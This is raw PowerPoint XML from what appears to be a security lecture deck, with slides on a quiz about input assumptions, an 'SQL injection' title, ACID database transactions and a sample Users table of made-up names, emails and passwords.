                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD806DE7-750B-764C-A16E-587E63BC0188}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="50308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625078"/>
            <a:ext cx="23513143" cy="1936068"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="8800" dirty="0"/>
              <a:t>Quiz 1: What are reasonable assumptions?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text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Suppose you are writing a PDF viewer that is leaner and better than Acrobat Reader. Which can you assume?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t>PDF files given to your reader will always be well-formed</a:t>
            </a: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t>PDF files will never exceed a particular size</a:t>
            </a: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t>You viewer will never be used as part of an Internet-hosted service</a:t>
            </a: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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>None of the above</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="uk-UA" smtClean="0"/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="uk-UA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14478452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p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>SQL injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>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192332117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6" name="Shape 526"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Server-side data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="527" name="Shape 527"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Typically want </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>ACID</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>transactions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>tomicity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Transactions complete entirely or not at all</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>onsistency</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>The database is always in a valid state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr b="1">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>solation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Results from a transaction aren’t visible until it is complete</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>urability</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Once a transaction is committed, its effects persist despite, e.g., power failures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr b="1" dirty="0">
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>Database Management Systems</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>DBMSes</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>) provide these properties (and then some)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="162915096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2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52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52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52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52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52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527">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5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p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1069217" y="555966"/>
            <a:ext cx="22095583" cy="2106816"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr defTabSz="426466">
              <a:defRPr sz="8176"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>SQL (Standard Query Language)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="530" name="Table 530"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6285755" y="3839281"/>
          <a:ext cx="11812487" cy="4940850"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{4C3C2611-4C71-4FC5-86AE-919BDF0F9419}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2323113">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1843520">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1947417">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3365154">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2333283">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="773868">
                <a:tc gridSpan="5">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3600" b="1">
                          <a:latin typeface="Helvetica"/>
                          <a:ea typeface="Helvetica"/>
                          <a:cs typeface="Helvetica"/>
                          <a:sym typeface="Helvetica"/>
                        </a:rPr>
                        <a:t>Users</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="71437" marR="71437" marT="71437" marB="71437" anchor="ctr" horzOverflow="overflow">
                    <a:lnL/>
                    <a:lnR/>
                    <a:lnT/>
                    <a:lnB/>
                    <a:solidFill>
                      <a:srgbClr val="000000">
                        <a:alpha val="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94497">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2200">
                          <a:solidFill>
                            <a:srgbClr val="FEFEFE"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Name</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" horzOverflow="overflow">
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:solidFill>
                      <a:schemeClr val="accent1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2200">
                          <a:solidFill>
                            <a:srgbClr val="FEFEFE"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Gender</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" horzOverflow="overflow">
                    <a:solidFill>
                      <a:schemeClr val="accent1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2200">
                          <a:solidFill>
                            <a:srgbClr val="FEFEFE"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Age</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" horzOverflow="overflow">
                    <a:solidFill>
                      <a:schemeClr val="accent1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2200">
                          <a:solidFill>
                            <a:srgbClr val="FEFEFE"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Email</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" horzOverflow="overflow">
                    <a:solidFill>
                      <a:schemeClr val="accent1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2200">
                          <a:solidFill>
                            <a:srgbClr val="FEFEFE"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Password</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" horzOverflow="overflow">
                    <a:solidFill>
                      <a:schemeClr val="accent1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="694497">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2200"/>
                        <a:t>Dee</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2200"/>
                        <a:t>F</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2200"/>
                        <a:t>28</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="2200"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr u="sng">
                          <a:hlinkClick r:id="rId2"/>
                        </a:rPr>
                        <a:t>dee@pp.com</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2200"/>
                        <a:t>j3i8g8ha</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="694497">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2200"/>
                        <a:t>Mac</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2200"/>
                        <a:t>M</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2200"/>
                        <a:t>7</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="2200"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr u="sng">
                          <a:hlinkClick r:id="rId3"/>
                        </a:rPr>
                        <a:t>bouncer@pp.com</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2200"/>
                        <a:t>a0u23bt</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="694497">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2200"/>
                        <a:t>Charlie</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2200"/>
                        <a:t>M</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2200"/>
                        <a:t>32</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="2200"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr u="sng">
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>aneifjask@pp.com</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2200"/>
                        <a:t>0aergja</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="694497">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2200"/>
                        <a:t>Dennis</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2200"/>
                        <a:t>M</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2200"/>
                        <a:t>28</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="2200"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr u="sng">
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>imagod@pp.com</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2200"/>
                        <a:t>1bjb9a93</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="694497">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2200">
                          <a:solidFill>
                            <a:schemeClr val="accent5"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Frank</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2200">
                          <a:solidFill>
                            <a:schemeClr val="accent5"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>M</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2200">
                          <a:solidFill>
                            <a:schemeClr val="accent5"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>57</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="2200">
                          <a:solidFill>
                            <a:schemeClr val="accent5"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                      <a:r>
                        <a:rPr u="sng">
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>armed@pp.com</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2200">
                          <a:solidFill>
                            <a:schemeClr val="accent5"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ziog9gga</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" horzOverflow="overflow"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="531" name="Shape 531"/>
          <p:cNvSpPr/>
          <p:nvPr/>
